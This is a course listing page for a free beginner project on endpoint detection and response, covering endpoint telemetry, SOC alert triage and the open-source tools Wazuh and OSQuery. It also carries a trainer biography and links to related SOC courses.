Beginner Free

Hands-on with EDR

Learn how EDR works in real SOC environments by understanding endpoint telemetry, detection logic, and response workflows—followed by hands-on walkthroughs of popular open-source EDR tools.

Self-Paced by Rajneesh Gupta

Overview

Endpoint Detection & Response (EDR) is one of the most critical pillars of modern SOC operations. While logs tell what happened, EDR shows how it happened, what executed, and what the attacker did next.

In this project, you will:

  • Understand what EDR is and why SOCs rely on it
  • Learn how EDR differs from traditional antivirus
  • Explore how endpoint telemetry is collected and analyzed
  • Walk through multiple open-source EDR tools used in real environments
  • Understand how EDR alerts feed into SOC triage and incident response

This project is hands-on and practical, preparing you for:

  • SOC L1/L2 investigations
  • Threat hunting
  • Incident response projects

What You'll Learn

  • Introduction to Endpoint Detection & Response (EDR)

    Understand what EDR is and why it is critical for modern SOC operations.

  • Endpoint Telemetry & Data Collection

    Understand the endpoint data collected, including processes, files, registry, and network activity.

  • Common EDR Alert Categories

    Identify alerts related to suspicious execution, persistence, lateral movement, and malware.

  • Open-Source EDR Tools Overview

    Explore popular open-source EDR tools and their core use cases.

  • Hands-on with Wazuh EDR

    Understand how Wazuh detects and alerts on endpoint activity.

  • Hands-on with OSQuery for Endpoint Visibility

    Learn how OSQuery provides deep visibility using SQL-like system queries.

About Trainer

Rajneesh Gupta

Rajneesh Gupta

Rajneesh Gupta is a seasoned cybersecurity professional with over 11 years of industry experience. With a remarkable career focused on incident response, penetration testing, security compliance, and risk management, Rajneesh has established himself as a leading expert in the field. He is also an accomplished author, having penned the book "Hands-on with Blockchain and Cybersecurity". As a dedicated educator, Rajneesh has made a significant impact on the cybersecurity community by training over 60,000 students globally.

LinkedIn YouTube GitHub

Related Projects

Hands-on with SOAR
Free Beginner

Hands-on with SOAR

Learn how SOAR platforms automate SOC operations by orchestrating tools, enriching alerts, and executing response actions—through hands-on walkthroughs of n8n, Shuffle, and Tines.

Windows Fundamentals
Free Beginner

Windows Fundamentals

Master the core Windows skills required for SOC Analysts, Security Engineers, IT Administrators, and Cloud Professionals through fully hands-on, task-based labs.

Introduction to SOC (Security Operations Center)
Free Beginner

Introduction to SOC (Security Operations Center)

Understand how a real-world Security Operations Center (SOC) operates by learning its purpose, people, tools, processes, data flow, alerts, and business impact through structured, concept-driven tasks.